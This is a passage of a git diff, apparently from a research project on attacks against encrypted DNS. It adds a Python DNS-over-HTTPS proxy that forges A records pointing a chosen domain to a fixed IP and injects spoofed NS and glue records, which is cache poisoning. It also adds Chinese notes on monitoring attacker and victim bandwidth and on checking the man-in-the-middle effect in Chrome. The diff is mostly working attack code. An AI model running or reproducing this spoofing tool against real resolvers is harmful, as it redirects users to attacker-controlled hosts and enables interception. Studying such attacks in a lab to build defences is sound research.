+ dns_response = await dns.asyncquery.udp(q = dns_request, port=DNS_SERVER_PORT, where=DNS_SERVER_ADDRESS)
+ #print(dns_response)
+
+ if str(doh_request.question[0].name) == tamper and int(doh_request.question[0].rdtype)==1:
+ print('---tamper---',tamper)
+ dns_response.answer = [ dns.rrset.from_text(tamper,3600,dns.rdataclass.IN, dns.rdatatype.A,'39.106.44.126')]
+ if str(doh_request.question[0].name) == inject:
+ print('---inject---',inject)
+ dns_response.additional = [dns.rrset.from_text(inject,3600,dns.rdataclass.IN, dns.rdatatype.NS,'ns.'+inject.split('.',1)[1]),
+ dns.rrset.from_text('ns.'+inject.split('.',1)[1],3600,dns.rdataclass.IN, dns.rdatatype.A,ns)]
+ #print(dns_response)
+ # 构建HTTPS响应
+ response = web.Response(body=dns_response.to_wire())
+ response.content_type = 'application/dns-message'
+ return response
+
+
+parser = argparse.ArgumentParser()
+parser.add_argument('-tamper', '--tamper', default='')
+parser.add_argument('-inject', '--inject', default='')
+parser.add_argument('-ns', '--ns', default='39.106.44.126')
+args = parser.parse_args()
+tamper = args.tamper +'.'
+inject = args.inject +'.'
+ns = args.ns
+#print('tamper:',tamper)
+DOH_SERVER_URL = "https://dns.alidns.com/dns-query"
+CERT_FILE = "/usr/local/etc/unbound/cert_new4/app.crt"
+KEY_FILE = "/usr/local/etc/unbound/cert_new4/app.key"
+ssl_context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
+ssl_context.load_cert_chain(CERT_FILE, KEY_FILE)
+app = web.Application()
+app.router.add_get(path='/dns-query',handler=doh_handler)
+app.router.add_post(path='/dns-query',handler=doh_handler)
+web.run_app(app, host='127.0.0.1', port=8444, ssl_context=ssl_context)
\ No newline at end of file
diff --git a/monitor/doe/monitor.md b/monitor/doe/monitor.md
new file mode 100644
index 0000000..06dd7c8
--- /dev/null
+++ b/monitor/doe/monitor.md
@@ -0,0 +1,2 @@
+nload 带宽实时统计工具 统计攻击启动后,攻击服务器和受害服务器的带宽消耗情况
+htop 资源占用实时统计工具 3.0.5 统计攻击启动后受害服务器的带宽消耗情况
diff --git a/peishi/doe/peishi.md b/peishi/doe/peishi.md
new file mode 100644
index 0000000..ff83641
--- /dev/null
+++ b/peishi/doe/peishi.md
@@ -0,0 +1,3 @@
+|dnsdist | DNS负载均衡器和流量管理器 |1.6.1|用于搭建加密DNS服务器
+|bind9 |DNS服务器 |9.19.16-1+ubuntu22.04.1+isc+1-Ubuntu |用于搭建加密DNS服务器
+|Chrome浏览器 |网络浏览器 |118.0.5993.118 |验证中间人攻击效果 |
